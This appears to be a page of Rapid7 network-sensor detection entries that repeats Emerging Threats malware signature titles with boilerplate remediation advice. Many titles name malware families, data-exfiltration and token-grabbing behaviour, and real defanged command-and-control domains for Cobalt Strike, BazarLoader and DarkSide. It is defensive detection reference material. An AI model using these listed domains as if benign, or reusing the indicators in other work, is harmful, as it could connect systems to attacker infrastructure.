
Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NetBackdoor User-Agent (.net backdoor)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Netbounce Program Wrapper Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Netbounce Proxy Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Netbounce Proxy User-Agent (idk)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Netbounce User-Agent (Netbounce)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Neverquest Request URI Struct

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Neverquest/Vawtrak Posting Data

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NEWPASS CnC Client Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NewPosThings Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NewPosThings Data Exfiltration

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NewPosThings POST with Fake UA and Accept Header

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Nexus Stealer CnC Data Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NightfallGT Discord Nitro Ransomware

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE NightfallGT Discord Token Grabber

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NightfallGT Mercurial Grabber

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Nitlove POS CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Nitro Stealer Exfil Activity (Response)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NOBELIUM - Cobalt Strike Malleable Profile M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE NOBELIUM - Cobalt Strike Malleable Profile M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NOBELIUM (TA421) EnvyScout Fingerprint Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NOBELIUM Win32/VaporRage Loader CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NORTHSTAR Client CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NORTHSTAR Client Data POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NORTHSTAR Command Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NORTHSTAR Command Sent to Client

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NORTHSTAR Interactive Client CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Novaloader Stage 2 VBS Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NSIS/TrojanDownloader.Agent.NZK CnC Activity M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NSIS/TrojanDownloader.Agent.NZK CnC Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NSO Group Pegasus Related Data Exfil (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NSO Group Pegasus Related Data Exfil (POST) M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NSO Group Pegasus Related Data Exfil (POST) M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE nspps Backdoor CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE nspps Backdoor - Sending SOCKS Details

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE nspps Backdoor - Task Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NS SSL Cert APT1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NuggetPhantom Module Download Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Nuke Ransomware Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Nymaim.BA CnC M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Nymaim.BA CnC M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Obitel Downloader Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed AHK Downloader Request Structure

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed APT41 Malicious SSL Cert (ColunmTK Campaign)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed APT/SideWinder CnC Domain in TLS SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed AridViper CnC Domain in TLS SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Awad Bot CnC Domain (hawad .000webhostapp .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed AZORult CnC Domain (miscrosoftworrd .000webhostapp .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BazarLoader Domain (bigjamg .xyz in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BazarLoader Domain (cntrhum .xyz in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BazarLoader Domain (dghns .xyz in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BazarLoader Domain (doldig .xyz in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BazarLoader Domain (gut45bg .xyz in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BazarLoader Domain (moig .xyz in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BazarLoader Domain (numklo .xyz in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BazarLoader Domain (sh78bug .xyz in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BazarLoader Domain (vighik .xyz in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Blackrota Domain (blackrato .ga in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BLINDINGCAN Domain (www .automercado .co .cr in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BLINDINGCAN Domain (www .sanlorenzoyacht .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BLUELIGHT Payload Domain (storage .jquery .services in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BOUNCEBEAM Backdoor CnC Domain (cloudflare .5156game .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Buer Loader CnC Domain (kkjjhhdff .site in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Buer Loader Domain (officewestunionbank .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Buran Ransomware UA

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Buran Ransomware UA (BURAN)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Buran Ransomware UA (GHOST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Card Skimmer CnC Domain in TLS SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CDC Ransomware User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Certificate Containing Double Base64 Encoded Executable Inbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Certificate Containing Possible Base64 Encoded Powershell Inbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cobalt Stike CnC Domain (nirsoft .me in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CobaltStrike CnC Domain (charity-wallet .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Observed CobaltStrike CnC Domain (defendersecyrity .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cobalt Strike CnC Domain (defenderupdateav .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Observed Cobalt Strike CnC Domain (dimentos .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CobaltStrike CnC Domain (gmbfrom .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Observed Cobalt Strike CnC Domain (gojihu .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cobalt Strike CnC Domain (Gojihu .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Encrypted Channel - T1573

ET MALWARE Observed CobaltStrike CnC Domain in TLS SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CobaltStrike CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cobalt Strike CnC Domain in TLS SNI (cs .lg22l .com)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CobaltStrike CnC Domain (krinsop .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Observed Cobalt Strike CnC Domain (onlineworkercz .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cobalt Strike CnC Domain (sazoya .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Encrypted Channel - T1573

ET MALWARE Observed Cobalt Strike CnC Domain (security-desk .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cobalt Strike CnC Domain (securityupdateav .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Observed CobaltStrike CnC Domain (stg .pesrado .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cobalt Strike CnC Domain (windowsupdatesc .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Observed Cobalt Strike CnC Domain (www .msfthelpdesk .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cobalt Strike CnC Domain (yawero .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Encrypted Channel - T1573

ET MALWARE Observed Cobalt Strike CnC Domain (yuxicu .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cobalt Strike CnC Domain (Yuxicu .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Encrypted Channel - T1573

ET MALWARE Observed Cobalt Strike Domain (asureupdate .tech in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cobalt Strike Domain in TLS SNI (stackpatc-technologies .digital)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CobaltStrike Loader Domain (cybersecyrity .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CobaltStrike/TEARDROP CnC Domain Domain in TLS SNI (mobilnweb .com)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cobalt Strike User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CobInt CnC Domain in TLS SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CoinMiner CnC Domain (en24zuggh3ywlj .x .pipedream .net in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Resource Hijacking - T1496

ET MALWARE Observed CoinMiner CnC Domain (endpsbn1u6m8f .x .pipedream .net in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Resource Hijacking - T1496

ET MALWARE Observed CoinMiner CnC Domain (enoyq5xy70oq .x .pipedream .net in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Resource Hijacking - T1496

ET MALWARE Observed Compromised Domain (cryptoarenastore .com in TLS SNI) (2021-11-12)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cryptor Ransomware CnC Domain (e3kok4ekzalzapsf .onion .ws in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Observed DarkSide Ransomware CnC Domain in TLS SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Observed DarkSide Ransomware Domain (baroquetees .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Observed DarkSide Ransomware Domain (catsdegree .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Observed DarkSide Ransomware Domain (rumahsia .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Observed DarkSide Ransomware Domain (temisleyes .com in TLS SNI)

Description

